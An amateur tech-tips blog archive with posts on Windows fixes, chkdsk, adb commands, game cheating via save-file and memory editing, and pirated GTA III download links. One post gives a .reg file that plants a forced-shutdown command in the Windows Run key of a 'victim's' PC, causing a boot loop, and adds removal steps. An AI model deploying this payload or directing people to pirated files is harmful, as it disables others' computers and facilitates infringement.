Saturday 22 July 2017

0

Source file name(s) is larger than is supported by file system

Posted in ,


Create a new empty folder, e.g. c:\empty
Then copy that empty folder onto the folder which contains the long filenames which you're trying to delete, e.g. c:\myannoyingfolder. 
Do this like so in the command prompt:

robocopy /MIR c:\empty c:\myannoyingfolder

Monday 2 December 2013

0

Shutdown your friend's computer everytime it start:

Posted in


Thats really easy.
put this followin text in a .reg file and run it in the victims pc:


[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\W
indows\CurrentVersion\Run]
"VIRUS"="%windir%\\SYSTEM32\\SHUTDOWN.EXE -t 1 -c \"Howz this new Virus ah\" -f"


DONT PUT IT IN UR COMPUTER, I AM NOT RESPONSIBLE, if it happens, to you, start windows in safe mode, and open registry editor by typiing REGEDIT in start->run. navigate to [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]and remove the string value named VIRUS, restart you computer.

You can also put this in a javascript code, just add this code to your webpage:

Be careful, a drawback of the js code is that norton antivirus's script blocking feature may block this.
0

Format the disk or RAW file problem - Solve flash drive or MMC card problem

Posted in
Sometimes when we insert our pen-drive or mmc card a dialog comes says format the disk and we cant able to open that drive or if this dialog comes,



simple way to solve this is to perform chkdsk command on the drive

- open cmd
-now type in cmd --->  chkdsk e: /r







here e: is your disk drive no.

if still error comes that "type of file system is raw ,chkdsk is not available for raw drive

than download zar recovery from here --> ZAR Recovery

 

Tuesday 15 October 2013

1

Game hack for root users - unlimited ammo in into the dead , city run 2 etc

Posted in
for this you need to be root user and if you are than install this app.


click here


now after installing this app browse to your game which will be in

data/data/here

 it will work for many games

for into the dead
data/data/com.sideinteractive.sif.DR

now open shared_prefs folder in this path . for every game you have to goto shared_prefs folder only

now open com.sidheinteractive.sif.DR.xml for into the dead game and open it with text editor

now you can unlock every weapons by just replacing 0 with 1

like to unlock shotgun goto

"shotgununlocked&quote;:0; and replace 0 with 1. do it for every weapons.


now for unlimited ammo

first start the game pickup any weapon and die without using that weapon

now goto path again and open above xml file

the weapon you died will be in , search for

WEAPON_LAST&quote;:9;

here 9 is for machine gun , all weapon have diffrent number from 1 to 9;

if there is 3 or 4 instaed of 9 than u can replace it with 9 .

now search for

AMMO_LAST&quote;:43;



here 43 is number of ammo left when u died you just have to replace this number with your own numbers .




now save it and start the game and pick up the first weapon in the way it will have unlimited ammo.




For city run 2 is same

goto data/data/com.jellkit.cityrun3d2lt/shared_prefs



here open com.jellklt.cityrun3d2lt.xml and edit your desired score


















for unlimited coin add hamber value to ur desire and you can also edit distance etc to unlock all weapons
2

Hack coins and gold of any client side games like temple run,subway surf,dead trigger,lane splinter and many more

Posted in
i have searched many hacks for different games but most of android games have only one solution " GAME CIH ".

this is small but very powerful app  it can simply change the coins or gold of ur game to ur wants.

here is how to use it.
showing in one game lane splinter u can do it in other games in same way.


first install this app

click here



now open this app and now click on hot-key which says disable


















now after clicking on disable button it will show press any button now click on ur home button



















now CIH will be minimized on left side of ur home.
now open any game and see its coin or gold value .
now open minimized CIH on left side and inser ur coin value by clicking input number button



















note that add value only on box which have 4byte and press ok if haven't found ur value or it says more than 100 values found than again make some coins and insert value again do it till you found minimum numbers like 100 or around.























if u have more than 100 values than click on value and see if it is 4bit and if it is enter ur desired number in it . enter  ur number in every 4bit box and one will work for sure.



















it works almost in every game

Thursday 31 May 2012

0

download GRAND THEFT AUTO III

Posted in

Download Apk: http://www.mediafire.com/?5kseabdmc21bilo
Download Data:  http://www.mediafire.com/?hv692b0ijwbrlhd

(nicely working on ARMv6, x10mini/x8/galaxy mini/ace/gio/y) - 95MB before, extracted 275MB! BUT NO SOUND

HOW TO INSTALL
1.extract data to Sdcard>Android>data>here

2.you are required to download this video before you play(http://www.mediafire.com/?eai3hhobxni88it)
3.extract file (GTA3.QVGA.MOVIES.rar)to sdcard/Android/data/com.rockstar.gta3/files/GTA/MOVIES
4.Install apk and lauch...
5.Launch the game & Accept the EULA license
6.It will ask you to download data


again,press back and minimize
game(home button)
7.now play game from notification
bar or recent apps


Note : if ripped data files are not
working for u then u will have to
download data files directly from
the app
 


use CHAINFIRE3D or upgrade your phone to 2.3.6 EmanonV5(ROM) for samsung galaxy mini user 

Monday 28 May 2012

0

how to move aplication to memory card in some android devices like galaxy mini

Posted in
as in galaxy mini we can not move application to MMC card for that you just have to follow this simple steps

1. download android sdk from here and also installer from here


now as from previous post install

- android SDK tools
- SDK platform
- google usb packages


now copy path . for example in my pc G:\android-sdk-windows\platform-tools

now open cmd and type

adb devices

adb shell


A $ sign should pop up


pm setInstallLocation 2





Another $ should pop up and you are done now exit it and now you can easily move your apps to sd card .

now if you wants to know if your install location is set or not than type

pm getInstallLocation